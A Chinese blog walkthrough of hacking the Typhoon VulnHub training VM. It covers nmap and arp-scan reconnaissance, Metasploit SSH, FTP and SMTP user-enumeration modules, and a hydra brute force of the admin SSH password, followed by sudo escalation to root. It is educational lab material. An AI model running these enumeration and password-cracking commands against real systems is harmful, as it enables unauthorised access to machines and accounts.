Typhoon-hack-test

 · 2020-5-27 · 次阅读


0x00背景

在一次微信推文中看到有师傅复现了这个靶机的渗透全过程,因而自己也下载下来玩玩。也借此机会复习下内网渗透的整体过程,以及相关知识,工具的运用。

Typhoon VM包含多个漏洞和配置错误。Typhoon可用于测试网络服务中的漏洞,配置错误,易受攻击的Web应用程序,密码破解攻击,权限提升攻击,后期利用步骤,信息收集和DNS攻击。

Typhoon-v1.02镜像下载地址:https://download.vulnhub.com/typhoon/Typhoon-v1.02.ova.torrent

0x01信息收集

使用arp探测存活主机:
arp-scan -l

发现靶机IP:192.168.23.153

接下来使用nmap扫一波端口:

#其中-sV是探测端口(-p只扫描端口)并识别其服务版本号,-A是支持系统,版本脚本探测。
nmap -sV -A 192.168.23.153  


可以看到开放了很多端口:21,22,25,80,110,6379等。。
上图中可以看到22端口的ssh的OpenSSH版本号6.6.1。
可以搜索一下该版本的漏洞:
searchsploit openssh

上图中可以看到在版本2.3-7.7下有两个账号枚举的漏洞,那就利用他们了。

0x02.1漏洞利用(ssh)

msfconsole
use scanner/ssh/ssh_enumusers
show options

爆破的字典使用(需要科学上网):namelist

set rhosts 192.168.23.153
set rport 22
set threads 50
set USER_FILE ~/dic/namelist.txt
exploit


可以看到上图中枚举出了admin账号。
接下来直接用hydra直接爆破admin的密码。

hydra -l admin -P /usr/share/wordlists/rockyou.txt.gz -t4  ssh://192.168.23.153 

-p PASS or -P FILE try password PASS, or load several passwords from FILE
-l ignore an existing restore file (don't wait 10 seconds)
-t TASKS run TASKS number of connects in parallel per target (default: 16)


可以看到爆破出了admin的password:metallica

因而可以直接登录上去了:

ssh admin@192.168.23.153


如图已经登录上去了。

0x03.1提权

直接尝试sudo bash,输入admin的密码:metallica.
成功得到root权限:

0x02.2漏洞利用(ftp)

上面已经利用ssh的用户遍历,以及密码的暴力破解等手段成功拿到root权限。
下面利用它的ftp端口着手。

从上面图上就可看出ftp的问题,可以直接运行匿名用户登录,这种设置就是最大的漏洞。
因而利用也很简单,直接使用msf的ftp匿名访问模块即可。
先使用exit从靶机的ssh中退出来,回到我们的kali机。
设置模块为ftp匿名扫描:

use scanner/ftp/anonymous
set Rhosts 192.168.23.153
run


如上图我们使用anonymous用户进入了目标的ftp,然而权限很低,无法执行上传文件,切换目录等操作。
因而还需要再次基础上拿下用户权限。

首先我们通过上面的ssh获取到了admin用户。接下来使用smtp获取其他用户名。

use auxiliary/scanner/smtp/smtp_enum 
set rhosts 192.168.23.153
run